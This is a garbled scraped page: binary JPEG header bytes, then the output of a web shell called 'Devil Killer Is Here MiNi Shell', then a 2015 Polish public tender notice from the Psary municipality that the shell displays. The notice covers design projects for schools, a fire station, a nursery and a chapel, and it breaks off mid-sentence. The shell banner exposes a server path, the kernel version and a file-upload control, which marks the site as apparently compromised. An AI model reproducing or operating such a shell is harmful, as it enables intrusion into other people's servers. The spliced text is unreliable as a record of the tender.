JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150715/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150715/178288-N-2015.html

<p class="kh_header"><b>Psary: Opracowanie kompletnych projektów budowlano - wykonawczych dla obiektów kubaturowych w Gminie Psary wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę i sprawowaniem nadzoru autorskiego, w podziale na pięć odrębnych zadań</b><br>
<b>Numer ogłoszenia: 178288 - 2015; data zamieszczenia: 15.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Psarach , ul. Malinowicka 4, 42-512 Psary, woj. śląskie, tel. 32 294 49 00 wew. 41, faks 32 294 49 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnych projektów budowlano - wykonawczych dla obiektów kubaturowych w Gminie Psary wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę i sprawowaniem nadzoru autorskiego, w podziale na pięć odrębnych zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie kompletnych projektów budowlano - wykonawczych dla obiektów kubaturowych w Gminie Psary wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę i sprawowaniem nadzoru autorskiego, w podziale na pięć odrębnych zadań: a) Zadanie Nr 1: Projekt budowlano-wykonawczy rozbudowy budynku Zespołu Szkolno - Przedszkolnego w Gródkowie przy ul. Leśnej 2- I,II. b) Zadanie Nr 2: Projekt modernizacji kuchni i zaplecza oraz pomieszczeń dodatkowych w Zespole Szkolno - Przedszkolnym w Dąbiu przy ul. Pocztowej 39 c) Zadanie Nr 3: Projekt termomodernizacji i przebudowy budynku OSP w Górze Siewierskiej -I, II. d)  Zadanie Nr 4: Projekt budowy żłobka w Psarach e) Zadanie Nr 5: Projekt konserwatorski kapliczki na Poddzwonku w Brzękowicach Dolnych Szczegółowe założenia projektowe opisano w załącznikach do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 71.24.70.00-1, 71.24.80.00-8, 71.25.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w zależności od Nr zadania w wysokości: - Zadanie Nr 1: 4 000,00 zł (cztery tysiące złotych), - Zadanie Nr 2: 400,00 zł (czterysta złotych), - Zadanie Nr 3: 2 000,00 zł (dwa tysiące złotych), -Zadanie Nr 4: 2 500,00 zł (dwa tysiące pięćset złotych), - Zadanie Nr 5: 160,00 zł (sto sześćdziesiąt złotych). 2. Wadium może być wniesione w jednej lub kilku następujących formach: pieniądzu,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Z 2007 r. Nr 42, poz. 275 z późn. zm.). 3. Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: Bank Spółdzielczy w Będzinie Oddział Psary nr:44843800010000025720160003, Uwaga: Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składania ofert. 3.1. Wadium wnoszone w postaci niepieniężnej (w innych dopuszczalnych formach wymienionych w pkt 2), należy złożyć w oryginale w siedzibie Zamawiającego kancelaria ogólna - parter budynku, za potwierdzeniem odbioru w terminie nie późniejszym niż termin składania ofert. 4. Do oferty należy dołączyć potwierdzenie wniesienia wadium to jest: a) polecenie przelewu - jeżeli wadium wniesiono w formie pieniężnej, b) kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę jeżeli wadium wniesiono w formie niepieniężnej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej na: a) Zadanie Nr 1- dwa projekty budowlane budowy, rozbudowy lub modernizacji obiektów sportowych (sale gimnastyczne, hale) o kubaturze co najmniej 2500 m3 każdy. b) Zadanie Nr 2- dwa projekty budowlane budowy, przebudowy lub modernizacji obiektów kubaturowych o wartości co najmniej 8 tysięcy zł, brutto każda. c) Zadanie Nr 3- dwa projekty budowlane budowy, przebudowy lub modernizacji obiektów kubaturowych o wartości co najmniej 40 tysięcy zł, brutto każda. d) Zadanie Nr 4- dwa projekty budowy budynku o kubaturze minimum 800 m3 każdy. e) Zadanie Nr 5- jeden projekt  budowy, przebudowy lub modernizacji obiektu zabytkowego. 2. Na potwierdzenie powyższego warunku Zamawiający żąda: a) Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, wg załącznika nr 4, oraz załączeniem: b) Dowodów, czy usługi zostały wykonane lub są wykonywane należycie. UWAGA 1: Zgodnie z Rozporządzeniem Prezesa rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane za dowody, o których mowa w pkt. b uznaje się: - poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; - oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej; 3. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w uwadze nr 1. 4. W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt.b) budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi, były wykonane o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu. UWAGA 2: Należy wykazać i przedłożyć dowody wykonania usług w liczbie i zakresie wystarczającym do wykazania spełniania opisanych wyżej warunków. UWAGA 3: W przypadku składania oferty na dwa lub więcej zadań należy wykazać spełnienie warunków dla każdego z zadań osobno</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje na: 1. ZADANIE Nr 1 a) min 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń, b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności budowlano-konstrukcyjnej bez ograniczeń, c) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji sanitarne bez ograniczeń, d) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji elektrycznej bez ograniczeń, na: 2. ZADANIE Nr 2 a) min 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń, b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji sanitarne bez ograniczeń, c) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji elektrycznej bez ograniczeń. na: 3. ZADANIE Nr 3 a) min 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń, b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności budowlano-konstrukcyjnej bez ograniczeń, c) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji sanitarne bez ograniczeń, d) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji elektrycznej bez ograniczeń. na: 4. ZADANIE Nr 4 a) min 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń, b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności budowlano-konstrukcyjnej bez ograniczeń, c) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji sanitarne bez ograniczeń, d) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji elektrycznej bez ograniczeń, e) min 1 osobą posiadającą uprawnienia do projektowania w specjalności drogowej bez ograniczeń na: 5. ZADANIE Nr 5 a) min 1 osobą posiadającą uprawnienia z zakresu konserwacji obiektów zabytkowych. W celu oceny spełniania przez Wykonawcę warunku Zamawiający żąda: a) Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wg. załącznika nr 5 do SIWZ, b) Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień wg. zapisów w załączniku nr 5 do SIWZ UWAGA 5: W przypadku składania oferty na dwa lub więcej zadań wykonawca może wykazać dysponowanie tymi samymi osobami w specjalności dla poszczególnych branży</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Należy wykazać i przedłożyć dowody wykonania robót budowlanych w liczbie i przedmiocie wystarczającym do wykazania spełniania opisanego wyżej warunku w sekcji III.3.2.Dowodami, o których wyżej mowa są: - poświadczenie; -z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; - oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej;. Uwaga: W przypadku gdy zamawiający jest podmiotem, na rzecz którego, roboty budowlane wskazane w wykazie, o którym wyżej mowa, zostały wcześniej wykonane, wykonawca nie ma obowiązku przekładania dowodów o których powyżej mowa; W przypadku składania oferty na dwa lub więcej zadań należy wykazać spełnienie warunków dla każdego z zadań osobno;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w zależności do Nr Zadania zał Nr 1,1a,1b,1c,1d do SIWZ. 2. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy-ów ubiegającego-cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać m.in.: dane pozwalające na identyfikację stron, zakres udostępnienia (np: w zakresie wiedzy i doświadczenia , potencjału technicznego), cel i czas udostępnienia. 2. W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów Zamawiający może żądać od wykonawcy dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielonej gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie: 1. Przedłużenie terminu wykonania przedmiotu umowy (aneks terminowy), w przypadkach: a) nie wynikających z winy Wykonawcy i nie możliwych do przewidzenia w chwili zawarcia umowy t.j. wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy. b) niezawinione przez Wykonawcę opóźnienia ze strony organów w wydawaniu uzgodnień, opinii i decyzji administracyjnych, konieczność dokonania zmian w dokumentacji w trakcie projektowania w przypadku wniesienia uwag przez mieszkańców (np. w związku z lokalizacja wjazdów lub przyłączy) gestorów sieci bądź inne podmioty, zmiany w przepisach prawnych powodujące konieczność pozyskania nieprzewidzianych wcześniej uzgodnień, opinii i innych dokumentów niezbędnych dla prawidłowej realizacji inwestycji c) wydłużające się czynności geodezyjne z powodów niezależnych od Wykonawcy d) przekroczenia przez Zamawiającego terminu 3 tygodni na zaakceptowanie wstępnej wersji projektu bądź wniesienia do niego uwag po tym terminie, termin wykonania przedmiotu umowy zostanie przedłużony odpowiednio o okres zwłoki. 2. Zamawiający przewiduje zmianę wynagrodzenia wykonawcy (ceny) o kwotę wynikającą ze zmienionych ustawowo stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy 3. Zmiany wysokości wynagrodzenia 1) należnego wykonawcy w odniesieniu do Zadania Nr 1 - I, w przypadku zmiany: a) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, b) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływa na koszty wykonania zamówienia przez Wykonawcę, każda ze stron w celu dokonania zmiany wynagrodzenia może wystąpić z takim żądaniem do drugiej strony Umowy. 2. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 1. Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem 